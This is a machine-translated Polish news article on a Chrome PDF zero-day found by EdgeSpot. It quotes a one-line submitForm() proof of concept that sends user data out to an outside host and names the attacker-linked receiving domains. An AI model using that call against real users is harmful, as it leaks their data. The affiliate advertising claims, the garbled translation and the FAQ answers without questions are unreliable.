- EdgeSpot odkrył intrygującą lukę zero-day wykorzystującą dokumenty PDF w Chrome.
- To słaby punkt może cię zaszkodzić, zbierając poufne dane na twoim komputerze.
- Poznaj nasze Strona internetowa i w chmurze aby uzyskać więcej informacji na temat innych narzędzi i usług.
- Jeśli interesują Cię przeglądarki, w naszym Centrum przeglądarek.
Spraw, aby wszystkie Twoje dokumenty były dostępne i bezpieczne za pomocą programu Adobe Acrobat Reader. To narzędzie do zarządzania dokumentami pozwoli Ci również podpisywać elektronicznie i tworzyć oficjalne formularze, aby zaoszczędzić czas w pracy. Pobierz go na swój komputer, a będziesz mógł:
- Otwieraj, drukuj i edytuj wszystkie pliki PDF i inne typy plików
- Łatwiejsze wypełnianie formularzy PDF
- Zaszyfruj najważniejsze dokumenty
Pobierz wszystkie aplikacje w specjalnej cenie!
Oprogramowanie do zarządzania dokumentami nr 1 na świecie jest teraz w świetnej cenie, więc pospiesz się!
Usługa wykrywania exploitów EdgeSpot odkryła intrygujące Chrom luka zero-day wykorzystująca dokumenty PDF.
Luka pozwala atakującym na: zbierać poufne dane za pomocą złośliwych dokumentów PDF otwartych w Chrome.
Gdy tylko ofiara otworzy odpowiednie pliki PDF w przeglądarce Google Chrome, złośliwy program zaczyna działać w tle, zbierając dane użytkownika.
Dane są następnie przesyłane na zdalny serwer kontrolowany przez hakerów. Być może zastanawiasz się, jakie dane są wysysane przez atakujących, celują w następujące dane na twoim komputerze:
- adres IP
- Pełna ścieżka pliku PDF w systemie
- Wersje systemu operacyjnego i Chrome
Uważaj na pliki PDF zawierające złośliwe oprogramowanie
Eksperci cętkowany że jedna z dwóch domen readnotify[.]com lub burpcollaborator[.]net otrzymywał dane.
Ujawnili, że napastnicy używają this.submitForm() PDF Javascript API do zbierania poufnych informacji o użytkownikach.
Przetestowaliśmy to z minimalnym PoC, prostym wywołaniem API, takim jak this.submitForm(' http://google.com/test’) spowoduje, że Google Chrome wyśle dane osobowe do google.com.
Ten błąd Chrome był wykorzystywany przez dwa różne zestawy szkodliwych plików PDF, które krążyły odpowiednio w październiku 2017 r. i wrześniu 2018 r.
Warto zauważyć, że zebrane dane mogą zostać wykorzystane przez atakujących do dostrojenia ataków w przyszłości. Raporty sugerują, że pierwsza partia plików została skompilowana przy użyciu usługi śledzenia PDF firmy ReadNotify.
Użytkownicy mogą korzystać z usługi w celu śledzenia wyświetleń użytkownika. EdgeSpot nie udostępnił żadnych szczegółów dotyczących charakteru drugiego zestawu plików PDF.
Szybka wskazówka: zmień przeglądarkę na Opera
W tych niespokojnych czasach jesteśmy na każdym kroku atakowani złośliwym oprogramowaniem, phishingiem i trojanami, więc musimy być bardziej czujni i chronić się.
A ponieważ jest to problem charakterystyczny dla Chrome, możesz uniknąć tego zagrożenia i wszystkich innych za pomocą przeglądarki zorientowanej na bezpieczeństwo, takiej jak Opera.
Ta przeglądarka ma wbudowany bloker reklam, który nie tylko usuwa takie zakłócenia, ale także blokuje skrypty analityczne, piksele śledzące i metody gromadzenia danych.
A jeśli chcesz mieć absolutną pewność, że trzymasz się z dala od wszelkich niebezpieczeństw, wejdź za wbudowane VPN usługa, z której można korzystać w 100% za darmo przez nieograniczony czas.
Opera
Opera oferuje doskonałą ochronę przed zagrożeniami dzięki wbudowanemu blokowaniu reklam i usłudze VPN za darmo!
Odwiedź stronę
Jak mogę chronić się przed lukami w plikach PDF?
Pobierz Adobe Acrobat PRO
Adobe i Chrome dobrze do siebie pasują, jeśli chodzi o obsługę plików PDF. Instalując rozszerzenie Adobe dla przeglądarki Chrome, możesz przeglądać i manipulować plikami PDF zgodnie z własnymi upodobaniami bez opuszczania ulubionej przeglądarki.
Pomimo solidnej struktury złośliwe oprogramowanie ukryte w plikach PDF może nie zostać wykryte, jeśli korzystasz ze standardowej wersji czytnika.
Zalecana jest wersja profesjonalna, aby zagwarantować ochronę i przechowywać dane z dala od hakerów.
Chociaż nie jest to bezpłatne, cena, którą zapłacisz, jest raczej niewielka za mnóstwo dodatkowych funkcji, z których będziesz korzystać, w tym zwiększone bezpieczeństwo plików PDF.
Dostępny jest również 7-dniowy bezpłatny okres próbny, dzięki czemu przed dokonaniem zakupu możesz poznać pełną wersję Pro.
Adobe Acrobat PRO
Trzymaj się z dala od złośliwego oprogramowania, pobierając program Adobe Acrobat PRO. Ma o wiele więcej funkcji niż darmowa wersja i zapewnia bezpieczeństwo danych.
Odwiedź stronę
Jeśli chcesz być bezpieczny podczas surfowania po Internecie, będziesz potrzebować w pełni dedykowanego narzędzia do zabezpieczenia swojej sieci. Zainstaluj teraz prywatny dostęp do Internetu i zabezpiecz się. Chroni Twój komputer przed atakami podczas przeglądania, maskuje Twój adres IP i blokuje wszelki niepożądany dostęp.
Usługa wykrywania exploitów EdgeSpot chciała ostrzec użytkowników Chrome o potencjalnych zagrożeniach, ponieważ nie oczekiwano, że poprawka zostanie wydana w najbliższej przyszłości.
EdgeSpot poinformował Google o luce w zeszłym roku, a firma obiecała opublikować łatę pod koniec kwietnia.
Możesz jednak rozważyć zastosowanie tymczasowego obejścia problemu, wyświetlając lokalnie otrzymane dokumenty PDF za pomocą innej aplikacji czytnika.
Możesz też otworzyć dokumenty PDF w Chrome, odłączając systemy od Internetu.
Często Zadawane Pytania
Tak. Ale jeśli chcesz mieć szerszy wybór, zapoznaj się z naszymi najlepszymi propozycjami dla ChromPrywatność rozszerzenia w ten kompletny przewodnik.
Ttutaj jest wiele rozszerzeń, które pozwalają PDFy przetwarzanie. Czek poza naszym doskonały przewodnik o najlepszych rozszerzeniach PDF dla Chrome.
Nie działa, ale możesz go szybko aktywować. Oto nasz kompleksowy przewodnik jak włączyć generator kodów QR w Chrome.
